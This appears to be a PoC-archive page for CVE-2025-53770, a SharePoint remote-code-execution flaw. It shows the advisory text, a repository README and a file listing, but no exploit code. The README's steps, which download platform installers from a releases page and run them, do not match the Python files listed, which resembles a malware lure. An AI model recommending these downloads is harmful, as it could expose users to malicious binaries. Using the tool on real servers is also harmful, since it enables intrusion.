Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%

CVE-2025-53770 PoC β€” Microsoft SharePoint Server Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)
Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
πŸ› οΈ Exploit Microsoft SharePoint WebPart Injection vulnerabilities for .NET deserialization and remote code execution using ToolPane.aspx.
Readme
# πŸ› οΈ CVE-2025-53770-Exploit - Simplified SharePoint Injection Exploit Tool

[![Download CVE-2025-53770-Exploit](https://img.shields.io/badge/Download-CVE--2025--53770--Exploit-brightgreen)](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases)

## πŸš€ Getting Started

Welcome to the CVE-2025-53770-Exploit project. This tool helps users test SharePoint applications for specific vulnerabilities easily. Follow the steps below to download and install the software.

## πŸ“₯ Download & Install

To get started with CVE-2025-53770-Exploit, you need to visit the page below to download the application:

[Visit the Releases Page to Download](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases)

1. Click on the link above.
2. On the Releases page, look for the latest version of the software.
3. Select the appropriate version for your operating system (Windows, Mac, or Linux).
4. Click the download link to save the file to your computer.

## πŸ’» System Requirements

Ensure your system meets the following requirements to run CVE-2025-53770-Exploit:

- Operating System: Windows 10 or higher, MacOS Sierra or higher, Linux (latest version preferred).
- Processor: Intel or AMD with a minimum of dual-core.
- RAM: At least 4GB.
- Disk Space: 100MB of free space for installation.
- Internet connection for downloading the application and updates.

## βš™οΈ Installation Instructions

Once you have downloaded the file, follow these steps to install the application:

### For Windows

1. Locate the downloaded file (usually in the Downloads folder).
2. Double-click the installer file to start the installation.
3. Follow the on-screen prompts to complete the installation.
4. Once the installation is finished, you can find the application in your Start Menu.

### For Mac

1. Open the downloaded file (usually a `.dmg` file).
2. Drag the CVE-2025-53770-Exploit icon into the Applications folder.
3. Open your Applications folder and double-click the CVE-2025-53770-Exploit icon to launch the application.

### For Linux

1. Open your terminal.
2. Navigate to the location where the file is downloaded.
3. Use the command `chmod +x CVE-2025-53770-Exploit` to make the file executable.
4. Run the application using `./CVE-2025-53770-Exploit`.

## πŸ›‘οΈ Using CVE-2025-53770-Exploit

After installation, follow these steps to use the tool effectively:

1. Launch CVE-2025-53770-Exploit from your applications menu or desktop.
2. Enter the URL of the SharePoint site you would like to test in the designated field.
3. Click the "Start Test" button to initiate the scan.
4. Wait while the application analyzes the site for vulnerabilities related to the CVE-2025-53770 exploit.
5. Review the results displayed in the application.

## πŸ“ Important Notes

- Please use this tool responsibly and only on websites you own or have explicit permission to test. Unauthorized testing can be illegal and unethical.
- The results are meant for educational and security improvement purposes only. Always consult with a professional before taking any action based on the results.

## πŸ“ž Support

If you encounter any issues or have questions, please reach out to the support team:

- Email: support@example.com (replace with appropriate contact)
- GitHub Issues: Report problems directly on this repository using the Issues tab.

## πŸ“… Changelog

For detailed information about updates and changes, visit our [Changelog](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases) on the Releases page. Regular updates will improve security and functionality.

## 🌟 Community Contributions

We welcome contributions from everyone. If you would like to improve this project or report issues, feel free to contribute through pull requests or submit issues directly on this repository. 

Thank you for choosing CVE-2025-53770-Exploit! Your security begins here. 

[Download CVE-2025-53770-Exploit](https://github.com/yashz0007/CVE-2025-53770-Exploit/releases)
File Snapshot

[4.0K] /data/pocs/5c7fce18356cc17890d82c0f25415a71202f7c63 β”œβ”€β”€ [ 300] compress.py β”œβ”€β”€ [5.8K] exploit.py β”œβ”€β”€ [3.9K] README.md β”œβ”€β”€ [ 120] requirements.txt └── [4.0K] YSLosf β”œβ”€β”€ [2.2K] Program.cs └── [ 368] YSLosf.csproj 1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’